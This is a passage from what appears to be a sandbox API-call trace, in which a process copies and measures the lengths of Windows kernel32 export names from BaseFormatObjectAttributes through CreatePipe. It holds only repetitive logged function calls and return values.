returned="BaseFormatObjectAttributes" [0030.542] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0030.542] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0030.542] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0030.542] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0030.542] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0030.542] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0030.542] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0030.542] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0030.542] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0030.542] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0030.542] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0030.542] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0030.542] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0030.542] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0030.542] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0030.542] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0030.543] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0030.543] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0030.543] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0030.543] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0030.543] lstrlenA (lpString="BEEP") returned 4 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0030.543] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0030.543] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0030.543] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0030.543] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0030.543] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0030.543] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0030.543] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0030.543] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0030.543] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0030.543] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0030.543] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0030.543] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0030.543] lstrlenA (lpString="CANCELIO") returned 8 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0030.544] lstrlenA (lpString="CANCELIOEX") returned 10 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0030.544] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0030.544] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0030.544] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0030.544] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0030.544] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0030.544] lstrlenA (lpString="CHECKELEVATION") returned 14 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0030.544] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0030.544] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0030.544] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0030.544] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0030.544] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0030.544] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0030.544] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0030.544] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0030.544] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0030.544] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0030.545] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0030.545] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0030.545] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0030.545] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0030.545] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0030.545] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0030.545] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0030.545] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0030.545] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0030.545] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0030.545] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0030.545] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0030.545] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0030.545] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0030.545] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0030.545] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0030.545] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0030.545] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0030.546] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0030.546] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0030.546] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0030.546] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0030.546] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0030.546] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0030.546] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0030.546] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0030.546] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0030.546] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0030.546] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0030.546] lstrlenA (lpString="COPYCONTEXT") returned 11 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0030.546] lstrlenA (lpString="COPYFILEA") returned 9 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0030.546] lstrlenA (lpString="COPYFILEEXA") returned 11 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0030.546] lstrlenA (lpString="COPYFILEEXW") returned 11 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0030.546] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0030.546] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0030.547] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0030.547] lstrlenA (lpString="COPYFILEW") returned 9 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0030.547] lstrlenA (lpString="COPYLZFILE") returned 10 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0030.547] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0030.547] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0030.547] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0030.547] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0030.547] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0030.547] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0030.547] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0030.547] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0030.547] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0030.547] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0030.547] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0030.547] lstrlenA (lpString="CREATEEVENTA") returned 12 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0030.547] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0030.547] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0030.547] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0030.548] lstrlenA (lpString="CREATEEVENTW") returned 12 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0030.548] lstrlenA (lpString="CREATEFIBER") returned 11 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0030.548] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0030.548] lstrlenA (lpString="CREATEFILEA") returned 11 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0030.548] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0030.548] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0030.548] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0030.548] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0030.548] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0030.548] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0030.548] lstrlenA (lpString="CREATEFILEW") returned 11 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0030.548] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0030.548] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0030.548] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0030.548] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0030.548] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0030.548] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0030.549] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0030.549] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0030.549] lstrlenA (lpString="CREATEJOBSET") returned 12 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0030.549] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0030.549] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0030.549] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0030.549] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0030.549] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0030.549] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0030.549] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0030.549] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0030.549] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0030.549] lstrcpyA (in: lpString1=0x81ecc8, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0030.549] 